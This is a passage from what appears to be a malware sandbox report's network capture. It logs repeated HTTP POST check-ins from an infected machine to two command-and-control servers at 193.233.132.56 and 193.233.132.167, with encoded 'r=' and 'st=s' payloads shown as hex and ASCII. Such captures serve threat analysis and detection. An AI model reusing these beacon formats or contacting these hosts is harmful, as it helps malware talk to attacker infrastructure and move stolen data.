Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:14.410401106 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1364 | 192.168.2.5 | 51218 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:14.589596033 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:36:14.843703985 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1365 | 192.168.2.5 | 51219 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:14.756815910 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:36:15.004563093 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1366 | 192.168.2.5 | 51220 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:15.095187902 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:15.347683907 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1367 | 192.168.2.5 | 51221 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:15.253256083 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:15.503249884 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1368 | 192.168.2.5 | 51222 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:15.684547901 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:36:15.935569048 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1369 | 192.168.2.5 | 51223 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:15.854589939 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:36:16.101836920 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1370 | 192.168.2.5 | 51224 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:16.192755938 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:16.443315983 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1371 | 192.168.2.5 | 51225 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:16.358067036 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:16.611038923 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1372 | 192.168.2.5 | 51226 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:16.774476051 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:36:17.018140078 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1373 | 192.168.2.5 | 51227 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:16.948791027 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:36:17.195646048 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1374 | 192.168.2.5 | 51228 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:17.267703056 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:17.514614105 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1375 | 192.168.2.5 | 51230 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:17.559027910 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:17.807255030 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1376 | 192.168.2.5 | 51231 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:17.851099968 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:18.096894026 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1377 | 192.168.2.5 | 51232 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:18.056127071 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:18.305314064 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1378 | 192.168.2.5 | 51233 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:18.351531982 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:18.603972912 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1379 | 192.168.2.5 | 51234 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:18.656086922 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:18.904742002 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1380 | 192.168.2.5 | 51235 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:18.943095922 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:19.187158108 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1381 | 192.168.2.5 | 51236 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:19.155095100 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:19.406025887 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1382 | 192.168.2.5 | 51237 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:19.438570976 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:19.689110994 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1383 | 192.168.2.5 | 51238 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:19.737612963 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:19.977926016 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:19 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1384 | 192.168.2.5 | 51239 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:20.020148993 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:20.261888027 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:20 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1385 | 192.168.2.5 | 51240 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:20.233139992 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:20.489478111 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:20 GMT
